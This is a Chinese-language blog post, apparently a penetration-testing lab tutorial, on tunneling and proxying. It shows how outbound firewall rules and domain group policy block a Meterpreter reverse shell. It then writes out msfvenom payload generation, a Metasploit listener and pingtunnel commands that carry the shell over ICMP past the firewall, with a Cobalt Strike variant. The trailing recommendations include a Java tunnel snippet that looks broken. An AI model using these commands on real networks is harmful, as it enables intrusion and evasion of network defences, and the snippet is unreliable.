隧道技术和代理技术(一)

已于 2024-03-05 20:27:13 修改
阅读量1.3w 收藏 31
点赞数 22
文章标签: 网络安全 python 信息可视化 linux android storm
于 2024-03-04 10:33:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74806534/article/details/136445469
版权

目录

基础知识

单机-防火墙-限制协议出入站

域控-防火墙-组策略对象同步

域控-防火墙-组策略不出网上线

基础知识

-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)

-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

主要了解

1、判断什么时候用代理

2、判断什么时候用隧道

3、判断出网和不出网协议

4、如何使用代理建立节点并连接

5、如何使用隧道技术封装协议上线

6、判断哪些代理或隧道情况选择放弃

首先了解什么是防火墙?

随便打开一个虚拟机防火墙可以发现有入站规则和出站规则

从字面意思应该就能理解了入站就是外部消息的输入到主机,出站就是主机应用向外部发送请求

image-20240302170809948

举俩个例子

1.防火墙服务器搭建一个web服务

有个人去访问了这个web服务,属于入站还是出站

当然是出站

2.防火墙上有个后门,现在执行后门,是出站还是入站,还是俩个都要

答案是俩个都,因为正反向连接的问题

单机-防火墙-限制协议出入站

注意当在windows上开启web服务时,关闭windows地公网防火墙,开启专用网络防火墙,外部主机是可以访问web服务的,但是当开启公网防火墙时,外部主机是无法访问web服务的

image-20240302204804365

步入正题

首先kali生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.23.128 LPORT=6688 -f exe > swq.exe

注意这里是

reverse是反向

bind是正向

image-20240302202723556

kali设置监听

接着到windows下运行swq.exe文件,发现可以成功上线

image-20240302205713922

但是如果我们给windows防火墙加规则

注意我们之前配的后面是reverse是反向,是后面主动连接被控服务器,需要配置出站规则

如果是bind是正向,服务器主动连接被控主机,需要配置入站规则来防止监听

接下来配置规则,控制面板到如图位置,点击高级设置

image-20240302210833534

点击出站规则,新建规则,端口

image-20240302210651307

端口6688

image-20240302211026861

操作阻止连接

配置全勾上

image-20240302211142876

名称随意,先禁用规则看是否可以上线

image-20240302211237416

可以上线

image-20240302211346318

启用规则

image-20240302211421191

无法上线

image-20240302211458127

其他方法上线

1.改变监听端口

2.更改协议除了防火墙阻止的tcp协议,还有其他协议,例如icmp

可以看如下的协议和osi每个层次对应的协议

image-20240302201216769

image-20240302201234562

如果禁用了tcp是不能通过http、ftp等协议来连接后门,因为http是基于tcp的,只能向下兼容

可以使用ICMP

域控-防火墙-组策略对象同步

熟悉常见主机配置不出网的操作流程

操作:组策略管理-域-创建GPO链接-防火墙设置

image-20240302214413823

点击编辑,找到高级安全配置,右击属性,域、专用、公用全部关闭。

image-20240302214758108

更新策略:强制&命令&重启

1.fhq右击有强制选项,就是不管你更不更新,强制统一

image-20240302215036821

2.命令

命令:gpupdate/force

到更新域主机下执行这个命令,会更新防火墙

比如,一开始这台域主机是防火墙是全开

image-20240302215319324

然后在这台域主机的cmd下运行上面命令

image-20240302215641086

现在再去看这台域主机的防火墙状态,全部关闭

image-20240302215731191

3.重启后会自动更新

域控-防火墙-组策略不出网上线

背景介绍:域控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP出网,其

中规则为出站规则,安全研究者通过入站取得SHELL权限,需要对其进行上线控制。

思路:正向连接&隧道技术

如果是入站被限制呢?反向连接&隧道技术也可以解决(前提看限制的多不多)

情况一:

主机出站TCP被封杀,入站没有,无互联网网络

正向连接(取得一台有网络的能和主机通讯的服务器权限 他有网)把数据给出网的机器,通过出网机器正向主动控制他

就是通过一个有网的域内机器,去正向连接那个没网的域内机器,去获取到数据,让有网的机器去传出

情况二:

主机出站TCP封杀,入站没有,有互联网网络

1.正向连接(取得一台有网络的能和主机通讯的服务器权限 他有网)

2.隧道技术(走其他协议出网即可)

隧道技术原理:将TCP协议数据封装成ICMP协议数据,具体操作就是,先将tcp引入靶机本地,然后通过隧道工具换成ICMP数据传到服务器上,注意前提是已经拿到目标靶机的shell,但是因为出规则,而受到网络限制,隧道不是横向移动

隧道转ICMP工具

GitHub - esrrhs/spp: A simple and powerful proxy

GitHub - bdamele/icmpsh: Simple reverse ICMP shell

GitHub - esrrhs/pingtunnel: Pingtunnel is a tool that send TCP/UDP traffic over ICMP

实操

1.msf隧道ICMP上线

首先msf生成后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=127.0.0.1
lport=3333 -f exe > hhh.exe

image-20240303203611606

然后msf启动监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
run

image-20240303204839950

kali开启隧道

./pingtunnel -type server

image-20240303204819356

然后靶机上运行,注意要用管理员运行cmd

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.23.128 -t 192.168.23.128:4444 -tcp 1 -noprint 1 -nolog 1

image-20240303211426247

然后运行hhh.exe文件

可以看到成功上线

image-20240303211558152

2.CS隧道ICMP上线

先启动cs

配置监听器,为什么就不多说了

监听器1:127.0.0.1 5555

监听器2:192.168.23.128 6666

image-20240303213205882

在启动cs的服务器上运行

./pingtunnel -type server

生成后门,用这个stageless文件

image-20240303213032787

监听用127.0.0.1的监听器

靶机上:(管理器运行)

pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.23.128 -t 192.168.23.128:6666 -tcp 1 -noprint 1 -nolog 1

然后运行后门成功上线

image-20240303214023542

 未完待续,如果喜欢可以等待隧道技术和代理技术(二)

小小邵同学
关注
  • 22
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
1.内外网简单知识 2.内网 1 和内网 2 通信问题 3.正向反向协议通信连接问题 4.内网穿透代理隧道技术说明 2.测试:内网 1 执行后门-免费主机处理-
代理方式移动IP国际漫游技术研究
01-19
目前移动数据业务漫游主要采用L2TP方式及移动IP方式,针对部分运营商不支持L2TP方式以及国内电信运营商PMIP(代理方式移动IP)的特殊需求,提出了通过AAA消息格式转换的方式实现代理方式移动IP国际漫游。
内网隧道代理技术
最新发布
qq_73630656的博客
01-04 1186
前言:在学习内网的过程中,我们不得不提到隧道的概念,隧道的搭建在内网渗透有着不可或缺的作用,那么隧道到底是什么呢?它在内网渗透又起到什么样的作用呢?下面由我来带领各位童鞋们一步步揭晓内网隧道代理技术的层层迷雾 本文以逐渐深入的方式详细介绍了nps、frp、ew、lcx、ssh等多种内网隧道代理工具的使用
什么是隧道代理?要如何设置隧道代理
xiaozhang888888的博客
11-09 586
HTTP代理随着互联网技术的发展,已经被人熟知。从产品细分来看,HTTP代理分为:动态HTTP代理,静态HTTP代理,和隧道代理,这当中,隧道代理引起使用方式便捷,更受企业和个人开发者喜爱。今天,我们就为新手开发者来科普科普,隧道代理是什么,我们在使用的时候又该如何设置。隧道代理技术,是建立在高性能主机之上的、可以通过云端实现HTTP代理的轻松切换。这项技术将用户的请求传送至各种不同的HTTP代理服务器,允许根据用户需求自定义转发周期。
内网渗透-必须掌握的代理隧道技术解答
告白的博客
10-09 4320
0x00 内网渗透为什么使用代理隧道技术 简单的来讲,当拿到某网络主机的权限,发现无法将流量或者权限发送出来,对渗透造成了很大的影响,所以内网渗透必须需要了解到两个技术知识,代理隧道技术。 1)代理解决的问题:代理简单来讲解决网络之间的通信问题,如内网与外网之间或者两者自己之间的通信,两个不同内网的通信就必须借助到代理,否则无法通讯。 2)隧道技术:简单来讲就是解决流量无法发送,隧道技术多用来绕过一些安全设备的监控,如防火墙,流量监控设备对我们发送的流量进行了拦截,这个时候需要接触隧道技术绕过拦截,隧道
内网渗透之隧道搭建和代理配置
m0_62207170的博客
03-14 1207
内网渗透之隧道搭建和代理配置
内网渗透-端口转发隧道技术
weixin_60329395的博客
08-02 1583
代理隧道技术区别、代理只是为了解决网络通信问题,有些内网访问不到,可以用代理实现、隧道不仅是解决网络的通信问题,更大的作用是绕过过滤,突破防火墙/入侵检测系统。(封装协议)
C#实现HTTP代理服务器技术
03-13
采用c#实现的代理服务器技术,绝对的通俗易懂,而且可以作为很好的学习案例进行分析。特别是和http协议打交道比较多的c#.net程序员可千万别错过哦!只要能够学到东西,积分都是浮云
流量代理之reGeorg内网穿透工具包.zip
01-13
关于通过reGeorg建立HTTP隧道的作用体现在,当我们能通过外网访问服务器A,但是我们并不能与位于内网的主机交互,这时reGeorg就派上了用场,假设此时我们拿到了服务器A的webshell,但是该内网主机的icmp、DNS、tcp和...
一种移动接入网络中4over6软线隧道方案的设计与实现 (2013年)
04-23
通过将4over6软线隧道技术与ARP代理技术相结合,解决IPv6大规模推广后,移动接入网络中依赖IPv4协议栈的遗留设备间的三层通信问题,并根据此设计思路在Linux平台上利用IPv6隧道模块和ARP代理功能完成工程性实现和...
SSH协议中隧道代理的用法详解
knight-yun的博客
07-17 5866
关于ssh协议中的隧道连接与代理的相关用法详解
代理隧道、网关
拯救世界的光太郎
09-28 1199
一、代理 我们平时浏览网页时,客户端向服务端发送请求,web服务器收到请求后,向浏览器返回网页数据,最后浏览器渲染网页呈现在我们面前。 而HTTP代理的原理基本相同,我们在客户端设置了HTTP代理服务器,所有的HTTP请求就会首先发送到HTTP代理服务器上,代理服务器自动提取请求数据包的Request数据,然后作为客户端向Web服务器发送请求。并且把Web服务器返回的数据转发给发送请求的客户端,代理服务器在这个过程中充当了中间人的角色。对于客户端来说,代理扮演服务器的角色,接收请求、返回响应。对于服务器
隧道代理的工作原理是什么,为何爬虫使用起来更高效?
xiaozhang888888的博客
02-28 370
下面我们来一探究竟。HTTP隧道代理主要是通过HTTP协议来传输数据,将请求数据包封装在HTTP报文中,然后通过代理服务器发送到目标服务器上,随后将目标服务器返回的响应数据包封装在HTTP报文中,再通过代理服务器返回到客户端。最后,使在爬取过程中用隧道HTTP代理,请求目标服务器的时间往往是比较耗时的,而隧道HTTP代理可以通过多个IP地址并行请求,从而提高爬取效率,缩短爬取时间。其次,隧道HTTP代理可以为用户定时切换或者自动切换IP,省去了切换HTTP代理的烦恼,节约了时间,从而提高爬虫的效率。
自己要怎么做一个隧道代理隧道代理搭建教程
njmanong的博客
01-07 1176
众所周知,隧道代理比动态短效代理贵,但是因为其产品特性,确实也更好用更方便,那我们要如何自己搭建起来隧道代理呢?说来也不复杂,按照我说的方法,即可搭建起来隧道代理
内网隧道代理
inslight的博客
09-22 103
内网隧道代理
HTTP代理原理以及HTTP隧道技术(经典)
热门推荐
zhangxinrun的专栏
10-14 1万+
<br />通过HTTP协议与代理服务器建立连接,协议信令中包含要连接到的远程主机的IP和端口号,如果有需要身份验证的话还需要加上授权信息,服务器收到信令后首先进行身份验证,通过后便与远程主机建立连接,连接成功之后会返回给客户端200,表示验证通过,就这么简单,下面是具体的信令格式:<br />CONNECT 124.xxx.xxx.xx:443 HTTP/1.1 //建立http隧道要443端口<br />Proxy-Connection: Keep-Alive   //客户端到服务器端的连接持续有效<b
ssh隧道代理
modabobo
08-30 294
ssh是用来远程登录主机的作用大家都知道,而且传输的内容全部经过加密处理也是大家喜欢其的主要因素。但其实ssh能做的更多,例如作为代理服务器。 通过ssh 的-D参数,我们可以在本地搭建一个socks5服务器,具体使用方法如下: ssh -qTNf -D 127.0.0.1:12345 [email protected] 其中-q表示该命令进入安静模式 -T是指该命令不占用shell...
http隧道 java_使用java语言实现http隧道技术
05-23
HTTP隧道技术是一种通过HTTP协议在客户端和服务器之间建立的通道,使得客户端可以通过该通道来访问服务器上的资源。使用HTTP隧道技术可以绕过某些网络限制,例如防火墙阻止了某些协议的访问,使用HTTP隧道技术可以将被限制的协议封装在HTTP请求中,从而绕过防火墙的限制。 在Java中实现HTTP隧道技术可以使用Java的URLConnection类来发送HTTP请求,并将需要访问的协议封装在HTTP请求中。具体实现步骤如下: 1. 创建一个URLConnection对象,设置请求的URL和请求方法为“CONNECT”。 2. 设置HTTP头信息,包括Host,User-Agent等。 3. 发送HTTP请求,获取服务器返回的响应。 4. 如果响应码为200,则表示隧道建立成功,可以通过该隧道来访问服务器上的资源。 5. 如果响应码为其他值,则表示隧道建立失败,需要根据响应码进行相应的处理。 下面是一个简单的Java实现HTTP隧道的示例代码: ``` import java.io.IOException; import java.net.URL; import java.net.URLConnection; public class HttpTunnel { public static void main(String[] args) throws IOException { String proxyHost = "proxy.example.com"; int proxyPort = 8080; String tunnelHost = "target.example.com"; int tunnelPort = 80; String targetHost = "www.example.com"; int targetPort = 80; // 创建连接代理服务器的URLConnection对象 URL proxyUrl = new URL("http://" + proxyHost + ":" + proxyPort); URLConnection proxyConn = proxyUrl.openConnection(); // 设置请求方法为CONNECT proxyConn.setRequestProperty("Proxy-Connection", "Keep-Alive"); proxyConn.setRequestProperty("Proxy-Authorization", "Basic " + new sun.misc.BASE64Encoder().encode("username:password".getBytes())); // 发送连接代理服务器的请求 proxyConn.connect(); // 获取连接代理服务器的响应 System.out.println("Response Code: " + proxyConn.getResponseCode()); System.out.println("Response Message: " + proxyConn.getResponseMessage()); // 创建连接隧道服务器的URLConnection对象 URL tunnelUrl = new URL("http://" + tunnelHost + ":" + tunnelPort); URLConnection tunnelConn = tunnelUrl.openConnection(proxyConn); // 设置请求方法为CONNECT tunnelConn.setRequestProperty("Connection", "Keep-Alive"); tunnelConn.setRequestProperty("Host", targetHost + ":" + targetPort); // 发送连接隧道服务器的请求 tunnelConn.connect(); // 获取连接隧道服务器的响应 System.out.println("Response Code: " + tunnelConn.getResponseCode()); System.out.println("Response Message: " + tunnelConn.getResponseMessage()); // 创建连接目标服务器的URLConnection对象 URL targetUrl = new URL("http://" + targetHost + ":" + targetPort); URLConnection targetConn = targetUrl.openConnection(tunnelConn); // 发送连接目标服务器的请求 targetConn.connect(); // 获取连接目标服务器的响应 System.out.println("Response Code: " + targetConn.getResponseCode()); System.out.println("Response Message: " + targetConn.getResponseMessage()); } } ``` 其中,proxyHost和proxyPort是连接代理服务器的地址和端口号,tunnelHost和tunnelPort是连接隧道服务器的地址和端口号,targetHost和targetPort是连接目标服务器的地址和端口号。在实际使用中,需要根据具体情况进行设置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值